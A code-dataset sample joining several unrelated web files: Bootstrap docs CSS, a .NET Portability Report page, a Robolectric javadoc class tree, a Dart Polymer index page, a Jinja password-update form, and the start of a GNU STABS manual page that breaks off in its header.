.scrollspy-example {
height: 200px;
overflow: auto;
position: relative;
}
/* Remove bottom margin on example forms in wells */
form.well {
padding: 14px;
}
/* Tighten up spacing */
.well hr {
margin: 18px 0;
}
/* Fake the :focus state to demo it */
.focused {
border-color: rgba(82,168,236,.8);
-webkit-box-shadow: inset 0 1px 3px rgba(0,0,0,.1), 0 0 8px rgba(82,168,236,.6);
-moz-box-shadow: inset 0 1px 3px rgba(0,0,0,.1), 0 0 8px rgba(82,168,236,.6);
box-shadow: inset 0 1px 3px rgba(0,0,0,.1), 0 0 8px rgba(82,168,236,.6);
outline: 0;
}
/* For input sizes, make them display block */
.docs-input-sizes select,
.docs-input-sizes input[type=text] {
display: block;
margin-bottom: 9px;
}
/* Icons
------------------------- */
.the-icons {
margin-left: 0;
list-style: none;
}
.the-icons i:hover {
background-color: rgba(255,0,0,.25);
}
/* Eaxmples page
------------------------- */
.bootstrap-examples .thumbnail {
margin-bottom: 9px;
background-color: #fff;
}
/* Responsive table
------------------------- */
.responsive-utilities th small {
display: block;
font-weight: normal;
color: #999;
}
.responsive-utilities tbody th {
font-weight: normal;
}
.responsive-utilities td {
text-align: center;
}
.responsive-utilities td.is-visible {
color: #468847;
background-color: #dff0d8 !important;
}
.responsive-utilities td.is-hidden {
color: #ccc;
background-color: #f9f9f9 !important;
}
/* Responsive tests
------------------------- */
.responsive-utilities-test {
margin-top: 5px;
margin-left: 0;
list-style: none;
overflow: hidden; /* clear floats */
}
.responsive-utilities-test li {
position: relative;
float: left;
width: 25%;
height: 43px;
font-size: 14px;
font-weight: bold;
line-height: 43px;
color: #999;
text-align: center;
border: 1px solid #ddd;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.responsive-utilities-test li + li {
margin-left: 10px;
}
.responsive-utilities-test span {
position: absolute;
top: -1px;
left: -1px;
right: -1px;
bottom: -1px;
-webkit-border-radius: 4px;
-moz-border-radius: 4px;
border-radius: 4px;
}
.responsive-utilities-test span {
color: #468847;
background-color: #dff0d8;
border: 1px solid #d6e9c6;
}
/* Responsive Docs
-------------------------------------------------- */
@media (max-width: 480px) {
/* Reduce padding above jumbotron */
body {
padding-top: 70px;
}
/* Change up some type stuff */
h2 {
margin-top: 27px;
}
h2 small {
display: block;
line-height: 18px;
}
h3 {
margin-top: 18px;
}
/* Adjust the jumbotron */
.jumbotron h1,
.jumbotron p {
text-align: center;
margin-right: 0;
}
.jumbotron h1 {
font-size: 45px;
margin-right: 0;
}
.jumbotron p {
margin-right: 0;
margin-left: 0;
font-size: 18px;
line-height: 24px;
}
.jumbotron .btn {
display: block;
font-size: 18px;
padding: 10px 14px;
margin: 0 auto 10px;
}
/* Masthead (home page jumbotron) */
.masthead {
padding-top: 0;
}
/* Don't space out quick links so much */
.quick-links {
margin: 40px 0 0;
}
/* hide the bullets on mobile since our horizontal space is limited */
.quick-links .divider {
display: none;
}
/* center example sites */
.example-sites {
margin-left: 0;
}
.example-sites > li {
float: none;
display: block;
max-width: 280px;
margin: 0 auto 18px;
text-align: center;
}
.example-sites .thumbnail > img {
max-width: 270px;
}
table code {
white-space: normal;
word-wrap: break-word;
word-break: break-all;
}
/* Modal example */
.modal-example .modal {
position: relative;
top: auto;
right: auto;
bottom: auto;
left: auto;
}
}
@media (max-width: 768px) {
/* Remove any padding from the body */
body {
padding-top: 0;
}
/* Jumbotron buttons */
.jumbotron .btn {
margin-bottom: 10px;
}
/* Subnav */
.subnav {
position: static;
top: auto;
z-index: auto;
width: auto;
height: auto;
background: #fff; /* whole background property since we use a background-image for gradient */
-webkit-box-shadow: none;
-moz-box-shadow: none;
box-shadow: none;
}
.subnav .nav > li {
float: none;
}
.subnav .nav > li > a {
border: 0;
}
.subnav .nav > li + li > a {
border-top: 1px solid #e5e5e5;
}
.subnav .nav > li:first-child > a,
.subnav .nav > li:first-child > a:hover {
-webkit-border-radius: 4px 4px 0 0;
-moz-border-radius: 4px 4px 0 0;
border-radius: 4px 4px 0 0;
}
/* Popovers */
.large-bird {
display: none;
}
.popover-well .popover-wrapper {
margin-left: 0;
}
/* Space out the show-grid examples */
.show-grid [class*="span"] {
margin-bottom: 5px;
}
/* Unfloat the back to top link in footer */
.footer .pull-right {
float: none;
}
.footer p {
margin-bottom: 9px;
}
}
@media (min-width: 480px) and (max-width: 768px) {
/* Scale down the jumbotron content */
.jumbotron h1 {
font-size: 54px;
}
.jumbotron p {
margin-right: 0;
margin-left: 0;
}
}
@media (min-width: 768px) and (max-width: 980px) {
/* Remove any padding from the body */
body {
padding-top: 0;
}
/* Scale down the jumbotron content */
.jumbotron h1 {
font-size: 72px;
}
}
@media (max-width: 980px) {
/* Unfloat brand */
.navbar-fixed-top .brand {
float: left;
margin-left: 0;
padding-left: 10px;
padding-right: 10px;
}
/* Inline-block quick links for more spacing */
.quick-links li {
display: inline-block;
margin: 5px;
}
}
/* LARGE DESKTOP SCREENS */
@media (min-width: 1210px) {
/* Update subnav container */
.subnav-fixed .nav {
width: 1168px; /* 2px less to account for left/right borders being removed when in fixed mode */
}
}
|
Reports/pc/pcladd.1.0.1/PCLADD-net11.html
|
kuhlenh/port-to-core
|
<!DOCTYPE html>
<html xmlns:msxsl="urn:schemas-microsoft-com:xslt">
<head>
<meta content="en-us" http-equiv="Content-Language" />
<meta content="text/html; charset=utf-16" http-equiv="Content-Type" />
<title _locid="PortabilityAnalysis0">.NET Portability Report</title>
<style>
/* Body style, for the entire document */
body {
background: #F3F3F4;
color: #1E1E1F;
font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
padding: 0;
margin: 0;
}
/* Header1 style, used for the main title */
h1 {
padding: 10px 0px 10px 10px;
font-size: 21pt;
background-color: #E2E2E2;
border-bottom: 1px #C1C1C2 solid;
color: #201F20;
margin: 0;
font-weight: normal;
}
/* Header2 style, used for "Overview" and other sections */
h2 {
font-size: 18pt;
font-weight: normal;
padding: 15px 0 5px 0;
margin: 0;
}
/* Header3 style, used for sub-sections, such as project name */
h3 {
font-weight: normal;
font-size: 15pt;
margin: 0;
padding: 15px 0 5px 0;
background-color: transparent;
}
h4 {
font-weight: normal;
font-size: 12pt;
margin: 0;
padding: 0 0 0 0;
background-color: transparent;
}
/* Color all hyperlinks one color */
a {
color: #1382CE;
}
/* Paragraph text (for longer informational messages) */
p {
font-size: 10pt;
}
/* Table styles */
table {
border-spacing: 0 0;
border-collapse: collapse;
font-size: 10pt;
}
table th {
background: #E7E7E8;
text-align: left;
text-decoration: none;
font-weight: normal;
padding: 3px 6px 3px 6px;
}
table td {
vertical-align: top;
padding: 3px 6px 5px 5px;
margin: 0px;
border: 1px solid #E7E7E8;
background: #F7F7F8;
}
.NoBreakingChanges {
color: darkgreen;
font-weight:bold;
}
.FewBreakingChanges {
color: orange;
font-weight:bold;
}
.ManyBreakingChanges {
color: red;
font-weight:bold;
}
.BreakDetails {
margin-left: 30px;
}
.CompatMessage {
font-style: italic;
font-size: 10pt;
}
.GoodMessage {
color: darkgreen;
}
/* Local link is a style for hyperlinks that link to file:/// content, there are lots so color them as 'normal' text until the user mouse overs */
.localLink {
color: #1E1E1F;
background: #EEEEED;
text-decoration: none;
}
.localLink:hover {
color: #1382CE;
background: #FFFF99;
text-decoration: none;
}
/* Center text, used in the over views cells that contain message level counts */
.textCentered {
text-align: center;
}
/* The message cells in message tables should take up all avaliable space */
.messageCell {
width: 100%;
}
/* Padding around the content after the h1 */
#content {
padding: 0px 12px 12px 12px;
}
/* The overview table expands to width, with a max width of 97% */
#overview table {
width: auto;
max-width: 75%;
}
/* The messages tables are always 97% width */
#messages table {
width: 97%;
}
/* All Icons */
.IconSuccessEncoded, .IconInfoEncoded, .IconWarningEncoded, .IconErrorEncoded {
min-width: 18px;
min-height: 18px;
background-repeat: no-repeat;
background-position: center;
}
/* Success icon encoded */
.IconSuccessEncoded {
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconSuccess#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABPElEQVR4Xp1Tv0vDUBi8FqeA4NpBcBLcWnQSApncOnTo4FSnjP0DsnXpH5CxiwbHDg4Zuj4oOEXiJgiC4FDcCkLWmIMc1Pfw+eMgQ77v3Xf3Pe51YKGqqisAEwCR1TIAsiAIblSo6xrdHeJR85Xle3mdmCQKb0PsfqyxxzM8K15HZADl/H5+sHpZwYfxyRjTs+kWwKBx8yoHd2mRiuzF8mkJniWH/13u3Fjrs/EdhsdDFHGB/DLXEJBDLh1MWPAhPo1BLB4WX5yQywHR+m3tVe/t97D52CB/ziG0nIgD/qDuYg8WuCcVZ2YGwlJ3YDugkpR/VNcAEx6GEKhERSr71FuO4YCM4XBdwKvecjIlkSnsO0Hyp/GxSeJAdzBKzpOtnPwyyiPdAZhpZptT04tU+zk7s8czeges//s5C5+CwqrR4/gw+AAAAABJRU5ErkJggg==);
}
/* Information icon encoded */
.IconInfoEncoded {
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconInformation#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABHElEQVR4Xs2TsUoDQRRF7wwoziokjZUKadInhdhukR9YP8DMX1hYW+QvdsXa/QHBbcXC7W0CamWTQnclFutceIQJwwaWNLlwm5k5d94M76mmaeCrrmsLYOocY12FcxZFUeozCqKqqgYA8uevv1H6VuPxcwlfk5N92KHBxfFeCSAxxswlYAW/Xr989x/mv9gkhtyMDhcAxgzRsp7flj8B/HF1RsMXq+NZMkopaHe7lbKxQUEIGbKsYNoGn969060hZBkQex/W8oRQwsQaW2o3Ago2SVcJUzAgY3N0lTCZZm+zPS8HB51gMmS1DEYyOz9acKO1D8JWTlafKIMxdhvlfdyT94Vv5h7P8Ky7nQzACmhvKq3zk3PjW9asz9D/1oigecsioooAAAAASUVORK5CYII=);
}
/* Warning icon encoded */
.IconWarningEncoded {
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconWarning#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAx0lEQVR4XpWSMQ7CMAxFf4xAyBMLCxMrO8dhaBcuwdCJS3RJBw7SA/QGTCxdWJgiQYWKXJWKIXHIlyw5lqr34tQgEOdcBsCOx5yZK3hCCKdYXneQkh4pEfqzLfu+wVDSyyzFoJjfz9NB+pAF+eizx2Vruts0k15mPgvS6GYvpVtQhB61IB/dk6AF6fS4Ben0uIX5odtFe8Q/eW1KvFeH4e8khT6+gm5B+t3juyDt7n0jpe+CANTd+oTUjN/U3yVaABnSUjFz/gFq44JaVSCXeQAAAABJRU5ErkJggg==);
}
/* Error icon encoded */
.IconErrorEncoded {
/* Note: Do not delete the comment below. It is used to verify the correctness of the encoded image resource below before the product is released */
/* [---XsltValidateInternal-Base64EncodedImage:IconError#Begin#background-image: url(data:image/png;base64,#Separator#);#End#] */
background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAABQElEQVR4XqWTvUoEQRCE6wYPZUA80AfwAQz23uCMjA7MDRQEIzPBVEyNTQUFIw00vcQTTMzuAh/AxEQQT8HF/3G/oGGnEUGuoNnd6qoZuqltyKEsyzVJq5I6rnUp6SjGeGhESikzzlc1eL7opfuVbrqbU1Zw9NCgtQMaZpY0eNnaaL2fHusvTK5vKu7sjSS1Y4y3QUA6K3e3Mau5UFDyMP7tYF9o8cAHZv68vipoIJg971PZIZ5HiwdvYGGvFVFHmGmZ2MxwmQYPXubPl9Up0tfoMQGetXd6mRbvhBw+boZ6WF7Mbv1+GsHRk0fQmPAH1GfmZirbCfDJ61tw3Px8/8pZsPAG4jlVhcPgZ7adwNWBB68lkRQWFiTgFlbnLY3DGGM7izIJIyT/jjIvEJw6fdJTc6krDzh6aMwMP9bvDH4ADSsa9uSWVJkAAAAASUVORK5CYII=);
}
</style>
</head>
<body>
<h1 _locid="PortabilityReport">.NET Portability Report</h1>
<div id="content">
<div id="submissionId" style="font-size:8pt;">
<p>
<i>
Submission Id
2334ab7a-0fbc-42a0-9ea7-06aa84cbf188
</i>
</p>
</div>
<h2 _locid="SummaryTitle">
<a name="Portability Summary"></a>Portability Summary
</h2>
<div id="summary">
<table>
<tbody>
<tr>
<th>Assembly</th>
<th>ASP.NET 5,Version=v1.0</th>
<th>Windows,Version=v8.1</th>
<th>.NET Framework,Version=v4.6</th>
<th>Windows Phone,Version=v8.1</th>
</tr>
<tr>
<td><strong><a href="#PCLADD">PCLADD</a></strong></td>
<td class="text-center">100.00 %</td>
<td class="text-center">100.00 %</td>
<td class="text-center">100.00 %</td>
<td class="text-center">100.00 %</td>
</tr>
</tbody>
</table>
</div>
<div id="details">
</div>
</div>
</body>
</html>
|
javadoc/3.4/org/robolectric/res/package-tree.html
|
robolectric/robolectric.github.io
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_112-google-v7) on Fri Jul 21 13:02:32 PDT 2017 -->
<title>org.robolectric.res Class Hierarchy</title>
<meta name="date" content="2017-07-21">
<link rel="stylesheet" type="text/css" href="../../../stylesheet.css" title="Style">
<script type="text/javascript" src="../../../script.js"></script>
</head>
<body>
<script type="text/javascript"><!--
try {
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="org.robolectric.res Class Hierarchy";
}
}
catch(err) {
}
//-->
</script>
<noscript>
<div>JavaScript is disabled on your browser.</div>
</noscript>
<!-- ========= START OF TOP NAVBAR ======= -->
<div class="topNav"><a name="navbar.top">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.top" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.top.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../org/robolectric/manifest/package-tree.html">Prev</a></li>
<li><a href="../../../org/robolectric/res/builder/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?org/robolectric/res/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_top">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_top");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.top">
<!-- -->
</a></div>
<!-- ========= END OF TOP NAVBAR ========= -->
<div class="header">
<h1 class="title">Hierarchy For Package org.robolectric.res</h1>
<span class="packageHierarchyLabel">Package Hierarchies:</span>
<ul class="horizontal">
<li><a href="../../../overview-tree.html">All Packages</a></li>
</ul>
</div>
<div class="contentContainer">
<h2 title="Class Hierarchy">Class Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/AttrData.html" title="class in org.robolectric.res"><span class="typeNameLink">AttrData</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/AttrData.Pair.html" title="class in org.robolectric.res"><span class="typeNameLink">AttrData.Pair</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/AttributeResource.html" title="class in org.robolectric.res"><span class="typeNameLink">AttributeResource</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/DocumentLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">DocumentLoader</span></a>
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxDocumentLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxDocumentLoader</span></a></li>
</ul>
</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/DrawableResourceLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">DrawableResourceLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/EmptyStyle.html" title="class in org.robolectric.res"><span class="typeNameLink">EmptyStyle</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/Style.html" title="interface in org.robolectric.res">Style</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/FileFsFile.html" title="class in org.robolectric.res"><span class="typeNameLink">FileFsFile</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/FsFile.html" title="interface in org.robolectric.res">FsFile</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/Fs.html" title="class in org.robolectric.res"><span class="typeNameLink">Fs</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/PackageResourceTable.html" title="class in org.robolectric.res"><span class="typeNameLink">PackageResourceTable</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/ResourceTable.html" title="interface in org.robolectric.res">ResourceTable</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/Plural.html" title="class in org.robolectric.res"><span class="typeNameLink">Plural</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/Qualifiers.html" title="class in org.robolectric.res"><span class="typeNameLink">Qualifiers</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/RawResourceLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">RawResourceLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResBunch.html" title="class in org.robolectric.res"><span class="typeNameLink">ResBunch</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResBundle.html" title="class in org.robolectric.res"><span class="typeNameLink">ResBundle</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResName.html" title="class in org.robolectric.res"><span class="typeNameLink">ResName</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceIdGenerator.html" title="class in org.robolectric.res"><span class="typeNameLink">ResourceIdGenerator</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceIds.html" title="class in org.robolectric.res"><span class="typeNameLink">ResourceIds</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceMerger.html" title="class in org.robolectric.res"><span class="typeNameLink">ResourceMerger</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourcePath.html" title="class in org.robolectric.res"><span class="typeNameLink">ResourcePath</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceTableFactory.html" title="class in org.robolectric.res"><span class="typeNameLink">ResourceTableFactory</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/RoutingResourceTable.html" title="class in org.robolectric.res"><span class="typeNameLink">RoutingResourceTable</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/ResourceTable.html" title="interface in org.robolectric.res">ResourceTable</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxLoader</span></a>
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxArrayLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxArrayLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxAttrLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxAttrLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxPluralsLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxPluralsLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxStyleLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxStyleLoader</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StaxValueLoader.html" title="class in org.robolectric.res"><span class="typeNameLink">StaxValueLoader</span></a></li>
</ul>
</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StringResources.html" title="class in org.robolectric.res"><span class="typeNameLink">StringResources</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StyleData.html" title="class in org.robolectric.res"><span class="typeNameLink">StyleData</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/Style.html" title="interface in org.robolectric.res">Style</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StyleResolver.html" title="class in org.robolectric.res"><span class="typeNameLink">StyleResolver</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/Style.html" title="interface in org.robolectric.res">Style</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/TextCollectingNodeHandler.html" title="class in org.robolectric.res"><span class="typeNameLink">TextCollectingNodeHandler</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ThemeStyleSet.html" title="class in org.robolectric.res"><span class="typeNameLink">ThemeStyleSet</span></a> (implements org.robolectric.res.<a href="../../../org/robolectric/res/Style.html" title="interface in org.robolectric.res">Style</a>)</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/TypedResource.html" title="class in org.robolectric.res"><span class="typeNameLink">TypedResource</span></a><T>
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/FileTypedResource.html" title="class in org.robolectric.res"><span class="typeNameLink">FileTypedResource</span></a>
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/FileTypedResource.Image.html" title="class in org.robolectric.res"><span class="typeNameLink">FileTypedResource.Image</span></a></li>
</ul>
</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/PluralRules.html" title="class in org.robolectric.res"><span class="typeNameLink">PluralRules</span></a></li>
</ul>
</li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/XmlContext.html" title="class in org.robolectric.res"><span class="typeNameLink">XmlContext</span></a></li>
</ul>
</li>
</ul>
<h2 title="Interface Hierarchy">Interface Hierarchy</h2>
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/FsFile.html" title="interface in org.robolectric.res"><span class="typeNameLink">FsFile</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/FsFile.Filter.html" title="interface in org.robolectric.res"><span class="typeNameLink">FsFile.Filter</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceTable.html" title="interface in org.robolectric.res"><span class="typeNameLink">ResourceTable</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceTable.Visitor.html" title="interface in org.robolectric.res"><span class="typeNameLink">ResourceTable.Visitor</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResourceValueConverter.html" title="interface in org.robolectric.res"><span class="typeNameLink">ResourceValueConverter</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/Style.html" title="interface in org.robolectric.res"><span class="typeNameLink">Style</span></a></li>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/StyleData.Visitor.html" title="interface in org.robolectric.res"><span class="typeNameLink">StyleData.Visitor</span></a></li>
</ul>
<h2 title="Enum Hierarchy">Enum Hierarchy</h2>
<ul>
<li type="circle">java.lang.Object
<ul>
<li type="circle">java.lang.Enum<E> (implements java.lang.Comparable<T>, java.io.Serializable)
<ul>
<li type="circle">org.robolectric.res.<a href="../../../org/robolectric/res/ResType.html" title="enum in org.robolectric.res"><span class="typeNameLink">ResType</span></a></li>
</ul>
</li>
</ul>
</li>
</ul>
</div>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<div class="bottomNav"><a name="navbar.bottom">
<!-- -->
</a>
<div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div>
<a name="navbar.bottom.firstrow">
<!-- -->
</a>
<ul class="navList" title="Navigation">
<li><a href="../../../overview-summary.html">Overview</a></li>
<li><a href="package-summary.html">Package</a></li>
<li>Class</li>
<li class="navBarCell1Rev">Tree</li>
<li><a href="../../../deprecated-list.html">Deprecated</a></li>
<li><a href="../../../index-all.html">Index</a></li>
<li><a href="../../../help-doc.html">Help</a></li>
</ul>
<div class="aboutLanguage"><script type="text/javascript" src="../../../highlight.pack.js"></script>
<script type="text/javascript"><!--
hljs.initHighlightingOnLoad();
//--></script></div>
</div>
<div class="subNav">
<ul class="navList">
<li><a href="../../../org/robolectric/manifest/package-tree.html">Prev</a></li>
<li><a href="../../../org/robolectric/res/builder/package-tree.html">Next</a></li>
</ul>
<ul class="navList">
<li><a href="../../../index.html?org/robolectric/res/package-tree.html" target="_top">Frames</a></li>
<li><a href="package-tree.html" target="_top">No Frames</a></li>
</ul>
<ul class="navList" id="allclasses_navbar_bottom">
<li><a href="../../../allclasses-noframe.html">All Classes</a></li>
</ul>
<div>
<script type="text/javascript"><!--
allClassesLink = document.getElementById("allclasses_navbar_bottom");
if(window==top) {
allClassesLink.style.display = "block";
}
else {
allClassesLink.style.display = "none";
}
//-->
</script>
</div>
<a name="skip.navbar.bottom">
<!-- -->
</a></div>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
</body>
</html>
|
web/index.html
|
denniskaselow/playground_dart_polymer
|
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="scaffolded-by" content="https://github.com/google/stagehand">
<title>playground_dart_polymer</title>
<!-- Add to homescreen for Chrome on Android -->
<meta name="mobile-web-app-capable" content="yes">
<link rel="icon" sizes="192x192" href="images/touch/chrome-touch-icon-192x192.png">
<!-- Add to homescreen for Safari on iOS -->
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black">
<meta name="apple-mobile-web-app-title" content="Web Starter Kit">
<link rel="apple-touch-icon-precomposed" href="apple-touch-icon-precomposed.png">
<!-- Tile icon for Win8 (144x144 + tile color) -->
<meta name="msapplication-TileImage" content="images/touch/ms-touch-icon-144x144-precomposed.png">
<meta name="msapplication-TileColor" content="#3372DF">
<!-- example of using a paper element -->
<link rel="import" href="packages/paper_elements/roboto.html">
<!-- example of your own custom element -->
<link rel="import" href="packages/playground_dart_polymer/main_app.html">
<link rel="stylesheet" href="styles.css">
</head>
<body unresolved>
<main-app></main-app>
<script type="application/dart">export 'package:polymer/init.dart';</script>
</body>
</html>
|
views/password-update.html
|
benkaiser/iasurvey
|
{% extends 'base/backend_base.html' %}
{% block title %}Surveys - Interns Australia{% endblock %}
{% block content %}
<div class="context">
<script>
function submitForm(){
var newpw = document.getElementById("newpw");
var confirmpw = document.getElementById("confirmpw");
var form = document.getElementById("pwform");
if(newpw.value != confirmpw.value){
alert("Oops! New Password and Confirm Password do not match");
return;
}
else if(newpw.value == ''){
alert("Sorry! Password cannot be empty!");
return;
}
else{
form.submit();
}
}
</script>
{% if error %}
<div class="alert alert-danger" role="alert">
<p>{{error}}</p>
</div>
{% endif %}
<div class="pass_update">
<form id="pwform" class="form" role="form" method="post" action="password-update">
<h3>Update Your Password</h3>
<div class="form-group">
<input type="hidden" name="username" value="{{username}}">
<label for="inputOldPassword">Old Password</label>
<!-- input oldpassword -->
<input type="password" class="form-control" id="oldpw" placeholder="Password" name="oldpw">
</br>
<label for="inputNewPassword">New Password</label>
<!-- input newpassword -->
<input type="password" class="form-control" id="newpw" placeholder="Password" name="newpw">
<br/>
<label for="comfirmNewPassword">Confirm Password</label>
<!-- input newpassword -->
<input type="password" class="form-control" id="confirmpw" placeholder="Password" name="confirmpw">
<br/>
<a id="btnSubmit" class="btn btn-primary" onclick="submitForm()"/>Submit</a>
<a id="btnBack" class='btn btn-default' href="/admin">Back</a>
</div>
</form>
</div>
</div>
{% endblock %}
|
toolchain/osx/gcc-arm-none-eabi-6-2017-q1-update/share/doc/gcc-arm-none-eabi/html/stabs/Parameters.html
|
ChangsoonKim/STM32F7DiscTutor
|
<html lang="en">
<head>
<title>Parameters - STABS</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="STABS">
<meta name="generator" content="makeinfo 4.8">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Variables.html#Variables" title="Variables">
<link rel="prev" href="Based-Variables.html#Based-Variables" title="Based Variables">
<link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage">
<!--
Copyright (C) 1992-2017 Free Software Foundation, Inc.
Contributed by Cygnus Support. Written by Julia Menapace, Jim Kingdon,
and David MacKenzie.
Permission is granted to copy, distribute and/or modify this document
under the terms of the GNU Free Documentation License, Version 1.3 or
any later version published by the Free Software Foundation; with no
Invariant Sections, with no Front-Cover Texts, and with no Back-Cover
Texts. A copy of the license is included in the section entitled ``GNU
Free Documentation License''.-->
<meta http-equiv="Content-Style-Type" content="text/css">
<style type="text/css"><!--
